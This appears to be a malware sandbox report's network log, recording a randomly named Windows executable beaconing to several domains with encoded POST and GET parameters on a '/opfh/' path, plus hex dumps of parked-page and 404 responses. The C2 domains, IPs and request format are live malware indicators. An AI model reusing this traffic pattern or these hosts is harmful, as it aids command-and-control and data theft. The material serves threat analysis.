                            x-request-id: 9ff244fc-cc88-4c10-a614-60ac7226d6b3
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw==
                            set-cookie: parking_session=9ff244fc-cc88-4c10-a614-60ac7226d6b3; expires=Mon, 27 May 2024 10:37:21 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 64 6f 4e 67 43 61 6e 4a 4d 70 31 46 4b 5a 44 62 46 43 31 41 6c 30 36 48 62 51 50 61 2f 4b 46 61 7a 47 6c 51 54 43 72 37 34 6b 49 6e 4c 6c 73 6d 55 5a 59 6e 66 75 71 78 6a 30 6d 65 34 71 49 37 4f 68 48 37 30 6a 62 46 73 77 66 50 4d 32 63 49 53 65 70 4a 41 77 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_doNgCanJMp1FKZDbFC1Al06HbQPa/KFazGlQTCr74kInLlsmUZYnfuqxj0me4qI7OhH70jbFswfPM2cISepJAw==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:22:21.970865965 CEST595INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOWZmMjQ0ZmMtY2M4OC00YzEwLWE2MTQtNjBhYzcyMjZkNmIzIiwicGFnZV90aW1lIjoxNzE2ODA1Mz


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            36192.168.2.763197199.59.243.225802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:24.036463022 CEST463OUTGET /opfh/?R40L6=i4up9kvrIhZylhTl+TGF8NSB39il2c4qnhHhVcZTirCO4e+BACowf4KjePAiAuddepejX0cVJHKGxf87gLVZ3yhxJ+t5gkh7Sx8ygwwh5CFsGAn8/fc7zcPpOBOJ0Z4qUeJ8jZdFyiV9&b2PX=hZXl7VFPKl04 HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Host: www.performacetoyota.ca
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            May 27, 2024 12:22:24.515012026 CEST1236INHTTP/1.1 200 OK
                            date: Mon, 27 May 2024 10:22:24 GMT
                            content-type: text/html; charset=utf-8
                            content-length: 1534
                            x-request-id: dcfc4490-067b-42c5-b31d-9ec325a7ab3a
                            cache-control: no-store, max-age=0
                            accept-ch: sec-ch-prefers-color-scheme
                            critical-ch: sec-ch-prefers-color-scheme
                            vary: sec-ch-prefers-color-scheme
                            x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hV3QC3E/9lMyqzjQd8VZzZhIvBpr3BUTfwqyh67fxGe9tq02UVkzg2BxVUPODbv9g4uv29WlWzH1xPBUwTG2Lg==
                            set-cookie: parking_session=dcfc4490-067b-42c5-b31d-9ec325a7ab3a; expires=Mon, 27 May 2024 10:37:24 GMT; path=/
                            connection: close
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 68 56 33 51 43 33 45 2f 39 6c 4d 79 71 7a 6a 51 64 38 56 5a 7a 5a 68 49 76 42 70 72 33 42 55 54 66 77 71 79 68 36 37 66 78 47 65 39 74 71 30 32 55 56 6b 7a 67 32 42 78 56 55 50 4f 44 62 76 39 67 34 75 76 32 39 57 6c 57 7a 48 31 78 50 42 55 77 54 47 32 4c 67 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                            Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_hV3QC3E/9lMyqzjQd8VZzZhIvBpr3BUTfwqyh67fxGe9tq02UVkzg2BxVUPODbv9g4uv29WlWzH1xPBUwTG2Lg==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                            May 27, 2024 12:22:24.515049934 CEST987INData Raw: 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62
                            Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZGNmYzQ0OTAtMDY3Yi00MmM1LWIzMWQtOWVjMzI1YTdhYjNhIiwicGFnZV90aW1lIjoxNzE2ODA1Mz


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            37192.168.2.763198185.31.240.240802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:39.040992022 CEST720OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.pricekaboom.com
                            Origin: http://www.pricekaboom.com
                            Referer: http://www.pricekaboom.com/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 218
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 76 38 54 79 37 46 63 73 4d 37 2b 6f 6a 6b 69 51 31 67 67 64 46 4c 4c 46 79 6b 38 56 38 58 51 6b 73 43 33 59 57 46 4f 48 4c 49 42 52 45 31 33 4a 71 61 38 2b 6d 68 6e 39 34 51 6f 4a 74 79 78 6c 54 32 2f 4b 6f 41 38 2f 42 77 33 6b 32 70 70 48 65 4f 4c 4c 4a 6f 51 4a 41 75 4a 43 49 79 59 30 78 54 48 48 66 6f 34 2b 62 34 33 61 4c 71 42 36 7a 35 36 4a 41 53 34 45 47 64 33 59 42 4a 4b 32 45 2f 46 55 4d 37 37 2b 4d 35 6d 49 70 4b 33 65 2f 68 79 47 41 47 4b 58 4d 67 72 46 63 49 36 61 61 68 45 4a 6a 42 4d 2f 7a 32 49 4f 4b 45 37 79 33 56 68 75 44 39 7a 36 54 4c 4c 2f 79 64 64 71 6e 36 6c 54 41 2b 73 45 73 4b 4d 39 50 32 76 39 30 51 3d 3d
                            Data Ascii: R40L6=v8Ty7FcsM7+ojkiQ1ggdFLLFyk8V8XQksC3YWFOHLIBRE13Jqa8+mhn94QoJtyxlT2/KoA8/Bw3k2ppHeOLLJoQJAuJCIyY0xTHHfo4+b43aLqB6z56JAS4EGd3YBJK2E/FUM77+M5mIpK3e/hyGAGKXMgrFcI6aahEJjBM/z2IOKE7y3VhuD9z6TLL/yddqn6lTA+sEsKM9P2v90Q==
                            May 27, 2024 12:22:39.695900917 CEST1236INHTTP/1.1 404 Not Found
                            date: Mon, 27 May 2024 10:22:39 GMT
                            server: Apache / ZoneOS
                            last-modified: Mon, 06 Nov 2023 23:06:18 GMT
                            etag: "1d7b-60983e6d29793"
                            accept-ranges: bytes
                            content-length: 7547
                            connection: close
                            content-type: text/html
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED]
                            Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
                            May 27, 2024 12:22:39.695919991 CEST1236INData Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67
                            Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero { max-width: 78.125r
                            May 27, 2024 12:22:39.695933104 CEST1236INData Raw: 72 65 6e 74 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 72 65 6d
                            Data Ascii: rent; cursor: pointer; color: var(--main-text-color); margin-top: 5rem; display: flex;}.arrow-left { margin-right: 0.5rem; vertical-align: middle;}.arrow-left path { fill: var(--main-text-color);}.back-btn:
                            May 27, 2024 12:22:39.695944071 CEST1236INData Raw: 20 76 61 72 28 2d 2d 73 65 63 6f 6e 64 61 72 79 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 7d 0a 0a 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 37 36 38 70 78 29 20 7b 0a 20 20 20 20 2e 63 6f 6e 74 61
                            Data Ascii: var(--secondary-text-color);}@media screen and (min-width: 768px) { .container { width: 85%; } .hero { flex-direction: row; } #illustration { display: block; } .text-wrapper {
                            May 27, 2024 12:22:39.700684071 CEST1236INData Raw: 73 3d 22 62 61 63 6b 2d 62 74 6e 22 3e 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 63 6c 61 73 73 3d 22 61 72 72 6f 77 2d 6c 65 66 74 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 32 30 22 20 78 6d
                            Data Ascii: s="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0006 1L10.8659 1.8653L3.34256 9.38866H19V10.6126Z" fill="bl
                            May 27, 2024 12:22:39.700711012 CEST1236INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 3c 62 75 74 74 6f 6e 20 6f 6e 63 6c 69 63 6b 3d 22 68 69 73 74 6f 72 79 2e 62 61 63 6b 28 29 22 20 63 6c 61 73 73 3d 22 62 61 63 6b 2d 62 74 6e 22 3e 3c 73 76 67 20 77 69 64 74 68 3d
                            Data Ascii: d on this server.</p><button onclick="history.back()" class="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.34256L10.8647 18.1347L9.99939 19L1 10.0006L10.0
                            May 27, 2024 12:22:39.700725079 CEST381INData Raw: 74 5b 6f 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 6e 29 72 65 74 75 72 6e 20 6e 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 63 3d 74 5b 6f 5d 3d 7b 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6f 5d 28 63 2c 63 2e 65 78 70 6f 72 74
                            Data Ascii: t[o];if(void 0!==n)return n.exports;var c=t[o]={exports:{}};return e[o](c,c.exports,r),c.exports}r.n=e=>{var t=e&&e.__esModule?()=>e.default:()=>e;return r.d(t,{a:t}),t},r.d=(e,t)=>{for(var o in t)r.o(t,o)&&!r.o(e,o)&&Object.defineProperty(e,o


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            38192.168.2.763199185.31.240.240802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:41.580988884 CEST740OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.pricekaboom.com
                            Origin: http://www.pricekaboom.com
                            Referer: http://www.pricekaboom.com/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 238
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 76 38 54 79 37 46 63 73 4d 37 2b 6f 69 45 53 51 32 41 63 64 45 72 4c 4b 2b 45 38 56 6c 6e 51 6f 73 43 37 59 57 41 76 61 4c 64 78 52 45 55 48 4a 72 66 51 2b 6e 68 6e 39 33 77 6f 32 70 79 78 71 54 32 7a 6f 6f 41 41 2f 42 77 6a 6b 32 6f 5a 48 65 39 7a 55 49 34 51 4c 55 65 4a 45 46 53 59 30 78 54 48 48 66 6f 39 62 62 38 54 61 4c 36 78 36 38 37 43 4b 44 53 34 46 42 64 33 59 58 35 4b 79 45 2f 45 37 4d 36 6d 62 4d 2f 69 49 70 50 4c 65 78 56 6d 48 58 32 4b 52 42 41 71 55 50 4b 76 69 59 51 55 43 70 52 49 68 2b 47 49 52 50 79 6d 51 74 33 74 43 64 73 4c 42 58 4a 76 4a 6c 37 41 66 6c 37 68 4c 4e 63 59 6c 7a 39 70 58 43 6b 4f 35 69 6d 59 42 58 68 34 46 52 32 54 4c 35 58 49 6a 48 38 6d 33 47 6e 4d 3d
                            Data Ascii: R40L6=v8Ty7FcsM7+oiESQ2AcdErLK+E8VlnQosC7YWAvaLdxREUHJrfQ+nhn93wo2pyxqT2zooAA/Bwjk2oZHe9zUI4QLUeJEFSY0xTHHfo9bb8TaL6x687CKDS4FBd3YX5KyE/E7M6mbM/iIpPLexVmHX2KRBAqUPKviYQUCpRIh+GIRPymQt3tCdsLBXJvJl7Afl7hLNcYlz9pXCkO5imYBXh4FR2TL5XIjH8m3GnM=
                            May 27, 2024 12:22:42.241200924 CEST1236INHTTP/1.1 404 Not Found
                            date: Mon, 27 May 2024 10:22:42 GMT
                            server: Apache / ZoneOS
                            last-modified: Mon, 06 Nov 2023 23:06:18 GMT
                            etag: "1d7b-60983e6d29793"
                            accept-ranges: bytes
                            content-length: 7547
                            connection: close
                            content-type: text/html
                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 75 6e 73 61 66 65 2d 69 6e 6c 69 6e 65 27 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 3a 72 6f 6f 74 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2d 2d 69 6c 6c 75 73 74 72 61 74 69 6f 6e 2d 6d 61 69 6e 2d 63 6f 6c 6f 72 3a 20 23 44 [TRUNCATED]
                            Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="Content-Security-Policy" content="default-src 'unsafe-inline'"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="robots" content="noindex"><title>404 Page Not Found</title><style>:root { --illustration-main-color: #D82E23 !important; }</style><style>.current-url { word-wrap: break-word; }</style><style type="text/css">:root { --main-text-color: #4E4E4E; --secondary-text-color: #959595; --illustration-main-color: #C3C3CC; --btn-border-radius: 0.25rem; --primary-btn-background: #C3C3CC; --primary-btn-color: #FCFCFC; --secondary-btn-background: #FCFCFC; --secondary-btn-color: #C3C3CC; --main-icon-color: #C3C3CC;}* { box-sizing: border-box; font-family: Arial, Helvetica, sans-serif; line-height: 1.5;}html { height: 100%;}html, body { margin: 0;}body {
                            May 27, 2024 12:22:42.241220951 CEST1236INData Raw: 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 30 30 70 78 3b 0a 20 20 20 20 6d 69 6e 2d 68 65 69 67
                            Data Ascii: display: flex; flex-direction: column; padding-top: 100px; min-height: 100%; font-size: 16px; font-weight: 400; background-color: #FCFCFC;}.hidden { display: none;}.container, .hero { max-width: 78.125r
                            May 27, 2024 12:22:42.241231918 CEST448INData Raw: 72 65 6e 74 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 6d 61 69 6e 2d 74 65 78 74 2d 63 6f 6c 6f 72 29 3b 0a 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 35 72 65 6d
                            Data Ascii: rent; cursor: pointer; color: var(--main-text-color); margin-top: 5rem; display: flex;}.arrow-left { margin-right: 0.5rem; vertical-align: middle;}.arrow-left path { fill: var(--main-text-color);}.back-btn:
                            May 27, 2024 12:22:42.241241932 CEST1236INData Raw: 72 2d 72 61 64 69 75 73 3a 20 76 61 72 28 2d 2d 62 74 6e 2d 62 6f 72 64 65 72 2d 72 61 64 69 75 73 29 3b 0a 20 20 20 20 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72
                            Data Ascii: r-radius: var(--btn-border-radius); cursor: pointer; background-color: var(--primary-btn-background);}.button a { display: inline-block; padding: 0.5rem 1rem 0.5rem 1rem; font-size: 16px; font-weight: 400; text-d
                            May 27, 2024 12:22:42.241252899 CEST1236INData Raw: 6c 61 73 73 3d 22 63 75 72 72 65 6e 74 2d 75 72 6c 22 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 74 72 6f 6e 67 3e 20 73 69 69 6e 20 73 65 72 76 65 72 69 73 20 65 69 20 6c 65 69 74 75 64 2e 3c 2f 70 3e 3c 62 75 74 74 6f 6e 20 6f 6e 63 6c 69 63 6b 3d 22 68
                            Data Ascii: lass="current-url"></span></strong> siin serveris ei leitud.</p><button onclick="history.back()" class="back-btn"><svg width="20" height="20" class="arrow-left" viewBox="0 0 20 20" xmlns="http://www.w3.org/2000/svg"><path d="M19 10.6126H3.3425
                            May 27, 2024 12:22:42.241262913 CEST1236INData Raw: 73 73 3d 22 65 72 72 6f 72 2d 63 6f 64 65 22 3e 34 30 34 3c 2f 68 31 3e 3c 68 33 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 53 69 76 75 61 20 65 69 20 6c c3 b6 79 64 79 3c 2f 68 33 3e 3c 70 20 63 6c 61 73 73 3d 22 64 65 73 63 22 3e 50 79 79 64
                            Data Ascii: ss="error-code">404</h1><h3 class="title">Sivua ei lydy</h3><p class="desc">Pyydetty URL-osoitetta <strong><span class="current-url"></span></strong> ei lytynyt tlt palvelimelta.</p><button onclick="history.back()" class="back-btn"><
                            May 27, 2024 12:22:42.241276026 CEST1169INData Raw: 76 61 72 20 65 3d 7b 32 32 35 3a 28 29 3d 3e 7b 63 6f 6e 73 74 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2e 63 6f 6e 74 65 6e 74 2d 65 74 22 29 2c 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53
                            Data Ascii: var e={225:()=>{const e=document.querySelectorAll(".content-et"),t=document.querySelectorAll(".content-ru"),r=document.querySelectorAll(".content-fi"),o=document.querySelectorAll(".content-en");let n=navigator.language.substring(0,2),c=locatio


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            39192.168.2.763200185.31.240.240802780C:\Program Files (x86)\oRaHmvfHWYZzFEfwbxQgAeJyPjGSHxrfxbuOcRfPhgphNnWIjpjKGasKyUEFMfgPzJomMLDtClGs\tvtoHmZUTcBKRIVpHYXPXI.exe
                            TimestampBytes transferredDirectionData
                            May 27, 2024 12:22:44.111512899 CEST1753OUTPOST /opfh/ HTTP/1.1
                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                            Accept-Language: en-US,en;q=0.5
                            Accept-Encoding: gzip, deflate
                            Host: www.pricekaboom.com
                            Origin: http://www.pricekaboom.com
                            Referer: http://www.pricekaboom.com/opfh/
                            Cache-Control: max-age=0
                            Content-Length: 1250
                            Content-Type: application/x-www-form-urlencoded
                            Connection: close
                            User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                            Data Raw: 52 34 30 4c 36 3d 76 38 54 79 37 46 63 73 4d 37 2b 6f 69 45 53 51 32 41 63 64 45 72 4c 4b 2b 45 38 56 6c 6e 51 6f 73 43 37 59 57 41 76 61 4c 63 6c 52 48 6d 2f 4a 71 38 6f 2b 6b 68 6e 39 70 67 6f 7a 70 79 78 33 54 32 72 73 6f 41 4d 56 42 79 62 6b 33 4f 4e 48 61 38 7a 55 47 49 51 4c 57 65 4a 46 49 79 59 62 78 54 58 44 66 6f 4e 62 62 38 54 61 4c 34 70 36 34 70 36 4b 46 53 34 45 47 64 33 55 42 4a 4b 65 45 2f 74 4d 4d 36 6a 75 4c 50 43 49 75 76 37 65 39 47 65 48 56 57 4b 54 4e 67 71 4d 50 4b 7a 39 59 55 31 37 70 53 55 66 2b 42 45 52 4d 45 69 50 77 31 52 31 65 4e 6a 62 57 62 76 49 73 49 77 74 39 49 68 67 4b 2b 51 61 2b 4e 70 55 44 30 6d 5a 73 51 4e 57 44 41 59 6d 66 48 44 6e 79 6e 35 6e 43 75 6d 68 63 7a 33 74 68 42 71 34 6f 36 6e 2b 65 6e 70 66 6d 6c 69 75 77 41 69 59 69 62 55 47 4c 37 76 71 73 62 79 32 55 62 6d 6f 64 